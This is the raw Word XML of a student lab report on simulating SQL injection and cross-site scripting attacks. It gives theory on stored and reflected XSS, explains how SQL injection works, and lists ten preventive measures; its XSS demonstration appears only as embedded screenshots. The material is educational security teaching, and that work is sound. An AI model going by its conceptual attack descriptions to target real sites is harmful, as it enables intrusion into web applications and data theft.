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62F1" w:rsidRDefault="008862F1" w:rsidP="008862F1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4725"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPERIMENT 1</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008862F1" w:rsidRPr="00CA754D" w:rsidRDefault="008862F1" w:rsidP="008862F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CLASS: TE CMPN A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ROLL NO. : 19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008862F1" w:rsidRPr="00CA754D" w:rsidRDefault="008862F1" w:rsidP="008862F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NAME: REBECCA DIAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CA754D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PID: 182027</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Aim: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To study simulation of SQL injection attack and Cross-Site Scripting attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Tools: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Website/Java/Python/PHP/MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Theory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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 Study </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XSSattack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
          </w:rPr>
          <w:t>S</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
          </w:rPr>
          <w:t>QL injections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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successful cross site scripting attack can have devastating consequences for an online business’s reputation and i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>ts relationship with its clients.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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Depending on the severity of the attack, user accounts may be compromised, Trojan </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>horse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> programs activated and page content modified, misleading users into willingly surrendering their private data. Finally, session cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>s could be revealed, enabling a perpetrator to impersonate valid users and abuse their private accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="460" w:line="24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Cross site scripting attacks can be broken down into two types: stored and reflected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>, also known as persistent XSS, is the more damaging o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>f the two. It occurs when a malicious script is injected directly into a vulnerable web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="460" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
          </w:rPr>
          <w:t>Reflected XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves the reflecting of a malicious script of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>f of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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b) How SQL Injection Works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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SQL Injection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) is a type of an injection attack that makes it possible to execute malic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web appl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ication and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.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
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>An SQL Injection vulnerability may affect any website or web application that uses an SQL database such as MySQL, Oracle, SQL Server, or others. Criminals may use it to gain unauthorized access to your sensitive data: customer information, personal data, t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rade secrets, intellectual property, and more. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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 Preventive Measures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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1.Trust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no-one:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assume all user-submitted data is evil and validate and sanitize everything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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 Don't use dynamic SQL when it can be avoided: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>used prepared statements, parameterized queries or stored procedures instead whenever possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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3.Update</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and patch:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities in applications and databases that hackers can exploit using SQL injection are regularly discovered, so it's vital to apply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>patches and updates as soon as practical.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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4.Firewall</w:t>
      </w:r>
      <w:proofErr w:type="gram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Consider a web application firewall (WAF) – either software or appliance based – to help filter out malicious data. A WAF can be particularly useful to provide some security protection against a particu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lar new vulnerability before a patch is available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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5.Reduce</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> your attack surface:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get rid of any database functionality that you don't need to prevent a hacker taking advantage of it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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6.Use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> appropriate privileges:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> don't connect to your database using an acc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ount with admin-level privileges unless there is some compelling reason to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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7.Keep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> your secrets secret:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assume that your application is not secure and act accordingly by encrypting or hashing passwords and other confidential data including connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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8.Don't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> divulge more information than you need to: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hackers can learn a great deal about database architecture from error messages, so ensure that they display minimal information. Use the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RemoteOnly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customErrors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode (or equivalent) to display </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>verbose error messages on the local machine while ensuring that an external hacker gets nothing more than the fact that his actions resulted in an unhandled error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>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9.Don't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> forget the basics:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Change the passwords of application accounts into the database re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gularly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Buy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> better software:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make code writers responsible for checking the code and for fixing security flaws in custom applications before the software is delivered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Program:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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 Implement a Web application and demonstrate XSS attack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4699738" cy="2801767"/>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4699738" cy="2801767"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4516354" cy="3300413"/>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4516354" cy="3300413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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943600" cy="29845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943600" cy="2984500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="29718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2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00486052" w:rsidRPr="00486052">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86052" w:rsidRPr="00486052">
        <w:rPr>
